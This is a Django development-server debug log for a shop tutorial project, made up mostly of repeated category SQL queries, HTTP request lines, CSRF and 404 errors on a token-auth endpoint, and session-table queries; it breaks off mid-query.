BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:34:00,189 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:34:00,194 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:34:00,197 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:34:00,200 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:34:00,203 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:34:00,205 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:34:00] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 07:34:10,679 utils 32059 139875701085952 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:34:10,685 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:34:10,689 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:34:10,691 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:34:10,695 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:34:10,697 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:34:10,699 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:34:10,702 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:34:10,704 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:34:10,707 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:34:10,710 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:34:10,712 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:34:10,714 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:34:10,716 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:34:10,720 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:34:10,722 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:34:10,724 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:34:10,726 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:34:10,729 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:34:10,732 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:34:10,736 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:34:10,739 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:34:10,742 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:34:10,744 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:34:10,746 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:34:10,750 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:34:10,752 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:34:10,754 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:34:10,757 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:34:10,759 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:34:10,762 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:34:10,765 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:34:10,767 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:34:10,769 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:34:10,771 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:34:10,775 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:34:10,778 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:34:10,780 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:34:10,782 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:34:10,784 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:34:10,787 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:34:10,789 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:34:10,791 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:34:10,794 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:34:10,797 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:34:10,799 utils 32059 139875701085952 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:34:10] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 07:34:39] "GET / HTTP/1.0" 302 0 /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/settings.py changed, reloading. Performing system checks... December 27, 2019 - 07:33:14 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 1 issue (0 silenced). DEBUG 2019-12-27 07:37:21,088 utils 32264 139909951379200 (0.007) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-27 07:37:21,095 utils 32264 139909951379200 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() Forbidden (CSRF cookie not set.): /api-token-auth/ [27/Dec/2019 07:41:16] "POST /api-token-auth/ HTTP/1.0" 403 2868 DEBUG 2019-12-27 07:42:01,551 utils 32264 139909917935360 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'api-token-auth'; args=('api-token-auth',) Not Found: /api-token-auth/ [27/Dec/2019 07:42:01] "GET /api-token-auth/ HTTP/1.0" 404 1747 Not Found: /api/api-token-auth/ [27/Dec/2019 07:42:34] "OPTIONS /api/api-token-auth/ HTTP/1.0" 404 6547 Not Found: /api/api-token-auth/ [27/Dec/2019 07:43:09] "OPTIONS /api/api-token-auth/ HTTP/1.0" 404 6547 [27/Dec/2019 07:43:21] "GET / HTTP/1.0" 302 0 Forbidden (CSRF cookie not set.): /api-token-auth/ [27/Dec/2019 07:45:08] "POST /api-token-auth/ HTTP/1.0" 403 2868 DEBUG 2019-12-27 07:45:26,874 utils 32264 139909917935360 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-27T07:45:26.865235+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 27, 7, 45, 26, 865235, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-27 07:45:26,878 utils 32264 139909917935360 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-27 07:45:26,884 utils 32264 139909917935360 (0.000) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('g6b5kylaf4glm3mfb70u6becl9zozzh3',) DEBUG 2019-12-27 07:45:26,886 utils 32264 139909917935360 (0.001) DELETE FROM "django_session" WHERE "django_session"."session_key" IN ('g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=('g6b5kylaf4glm3mfb70u6becl9zozzh3',) DEBUG 2019-12-27 07:45:26,912 utils 32264 139909917935360 (0.001) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'a6besg1e18ujrqsh8scsz6tnflleeqah' LIMIT 1; args=('a6besg1e18ujrqsh8scsz6tnflleeqah',) DEBUG 2019-12-27 07:45:26,914 utils 32264 139909917935360 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('a6besg1e18ujrqsh8scsz6tnflleeqah', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-10T07:45:26.913022+00:00'::timestamptz); args=('a6besg1e18ujrqsh8scsz6tnflleeqah', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 10, 7, 45, 26, 913022, tzinfo=)) [27/Dec/2019 07:45:26] "GET /logout/ HTTP/1.0" 200 1180 DEBUG 2019-12-27 07:45:29,361 utils 32264 139909917935360 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-27T07:45:29.351000+00:00'::timestamptz AND "django_session"."session_key" = 'a6besg1e18ujrqsh8scsz6tnflleeqah'); args=(datetime.datetime(2019, 12, 27, 7, 45, 29, 351000, tzinfo=), 'a6besg1e18ujrqsh8scsz6tnflleeqah') [27/Dec/2019 07:45:29] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 07:45:29,639 utils 32264 139909917935360 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-27T07:45:29.630012+00:00'::timestamptz AND "django_session"."session_key" = 'a6besg1e18ujrqsh8scsz6tnflleeqah'); args=(datetime.datetime(2019, 12, 27, 7, 45, 29, 630012, tzinfo=), 'a6besg1e18ujrqsh8scsz6tnflleeqah') DEBUG 2019-12-27 07:45:29,694 utils 32264 139909917935360 (0.006) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2020-01-10T07:45:29.686839+00:00'::timestamptz WHERE "django_session"."session_key" = 'a6besg1e18ujrqsh8scsz6tnflleeqah'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 10, 7, 45, 29, 686839, tzinfo=), 'a6besg1e18ujrqsh8scsz6tnflleeqah') [27/Dec/2019 07:45:29] "GET /login/?next=/ HTTP/1.0" 200 1786 [27/Dec/2019 07:45:29] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 DEBUG 2019-12-27 07:45:32,940 utils 32264 139909917935360 (0.003) SELECT "django_session"."session_key", 